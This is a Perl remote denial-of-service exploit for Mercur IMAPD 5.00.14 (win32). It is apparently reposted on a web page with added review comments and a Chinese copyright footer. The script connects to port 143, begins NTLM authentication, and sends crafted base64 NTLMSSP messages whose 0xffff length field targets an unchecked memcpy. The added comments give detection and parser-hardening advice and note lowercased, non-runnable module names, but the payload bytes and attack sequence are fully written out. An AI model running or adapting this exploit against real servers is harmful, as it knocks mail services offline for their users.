
Mercur IMAPD 5.00.14 Remote Denial of Service Exp

  #!/usr/bin/perl
  #
  # mercur-v1.pl
  #
  # mercur v5.00.14 (win32) remote exploit
  # by mu-b - dec 2006
  #
  # - tested on: mercur v5.00.14 (win32)
  #
  ########
  # NOTE(review): module and constant names in this listing appear to have been
  # lower-cased by the hosting page; read it as a record of the wire exchange
  # rather than as runnable code.
  #
  # What the exchange looks like on the wire (useful for detection):
  #   1. client -> tcp/143: tagged command "1 authenticate ntlm"
  #   2. client -> base64 line: "ntlmssp" marker + 100 filler bytes
  #   3. client -> base64 line: "ntlmssp" marker + a short structure whose
  #      16-bit field marked `b` below is 0xffff
  # No login precedes these messages and the script never reads a server reply,
  # so the whole exchange is unauthenticated and blind. Per the author's memcpy
  # note further down, the server is believed to use the client-supplied `a`
  # (offset) and `b` (length) without checking them against the size of the
  # decoded message.
  #
  # Defensive takeaways: a parser for this message has to reject any
  # offset/length pair that reaches past the decoded buffer. On the network
  # side, an AUTHENTICATE NTLM continuation whose decoded length fields exceed
  # the decoded message size, followed by the IMAP service dropping, is the
  # pattern to alert on. Limiting who can reach tcp/143 reduces exposure for
  # hosts still running the version named in the header.

  # Parse command-line options into %arg. -n is accepted but never read in the
  # visible code; only -t is used.
  use getopt::std; getopts('t:n:', \%arg);
  use socket;
  use mime::base64;
  # Banner first, before any argument validation.
  &print_header;
  my $target;
  if (defined($arg{'t'})) { $target = $arg{'t'} }
  # usage() exits with status 1, so execution only continues with a target set.
  if (!(defined($target))) { &usage; }
  my $imapd_port = 143;   # standard cleartext IMAP port
  my $send_delay = 1;     # seconds to pause after each send
  # connect_host() dies on failure and returns a true value otherwise, so this
  # condition is effectively always true when it is reached.
  if (connect_host($target, $imapd_port)) {
  print("-> * connected\n");
  # Step 1: start the SASL exchange and select the NTLM mechanism (tag "1").
  $buf = "1 authenticate ntlm\r\n";
  send(socket, $buf, 0);
  sleep($send_delay);
  print("-> * sending payload\n");
  # Step 2: first continuation. Author's note: this is the `src` buffer of the
  # memcpy described below -- the "ntlmssp" marker followed by filler.
  # src = "ntlmssp....."
  $buf = "ntlmssp".("a"x100);
  send(socket, encode_base64($buf)."\r\n", 0);
  sleep($send_delay);
  # Step 3: second continuation. Author's note on the server-side operation
  # this message is meant to reach; `a` and `b` are the fields tagged below.
  # memcpy(s, src+a, b);
  print("-> * sending payload 2\n");
  $buf = "ntlmssp".
  "\x69".
  "\x03\x00\x00\x00".
  "\xff\xff".         # b: length operand in the memcpy note above (0xffff)
  ("a"x2).
  "\x00\x00".         # a: offset operand in the memcpy note above (0)
  ("a"x2).
  "\x00\x00".
  ("a"x2).
  "\x00\x00".
  ("a"x2).
  "\x04\x00".
  ("a"x6).
  "\x00\x80".
  ("a"x6).
  "\x04\x00".
  ("a"x12);
  send(socket, encode_base64($buf)."\r\n", 0);
  sleep($send_delay);
  # Printed unconditionally: the return values of send() are never checked and
  # nothing is read back, so this line does not confirm delivery or any effect
  # on the server.
  print("-> * successfully sent payload!\n");
  }
  sub print_header {
  print("mercur v5.00.14 (win32) remote exploit\n");
  print("by: \n\n");
  }
  sub usage {
  print(qq(usage: $0 -t
  -t     : hostname to test
  ));
  exit(1);
  }
  # Open a TCP connection to ($target, $port) on the bareword handle `socket`,
  # the same handle the top-level code passes to its send() calls.
  #
  # Each step is followed by `|| die`, so a failure ends the script with
  # "error: $!" instead of returning false. On success the sub returns 1338,
  # which the caller only tests for truth.
  #
  # Nothing is declared with `my` here: $target is the file-level lexical, and
  # $port/$iaddr/$paddr/$proto are not declared anywhere in the visible listing.
  sub connect_host {
  ($target, $port) = @_;
  # Resolve the host name (or dotted quad) to a packed IPv4 address.
  $iaddr  = inet_aton($target)                 || die("error: $!\n");
  # Combine port and address into a packed socket address.
  $paddr  = sockaddr_in($port, $iaddr)         || die("error: $!\n");
  $proto  = getprotobyname('tcp')              || die("error: $!\n");
  # Create the stream socket, then connect it to the resolved address.
  socket(socket, pf_inet, sock_stream, $proto) || die("error: $!\n");
  connect(socket, $paddr)                      || die("error: $!\n");
  # Any true value would do; the caller uses this only as an `if` condition.
  return(1338);
  }
 


    文章作者: 福州军威计算机技术有限公司
    版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
